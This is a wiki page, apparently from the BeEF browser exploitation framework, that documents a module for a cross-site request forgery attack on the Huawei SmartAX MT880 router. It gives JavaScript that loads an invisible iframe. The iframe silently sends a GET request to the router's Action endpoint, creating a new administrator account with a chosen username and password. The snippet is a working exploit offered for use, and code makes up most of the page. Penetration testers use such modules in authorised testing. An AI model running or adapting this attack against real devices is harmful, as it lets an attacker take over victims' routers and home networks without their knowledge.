-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Huawei SmartAX MT880 CSRF
Jess Williams edited this page Jan 13, 2020
·
3 revisions
-
Objective: add an administrator account on a Huawei SmartAX MT880 router
-
Authors: bcoles
-
Browsers: All
Uses an invisible iframe with a GET request to add an admin account.
var gateway = '<%= @base %>';
var username = '<%= @username %>';
var passwd = '<%= @password %>';
var timeout = 15;
var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK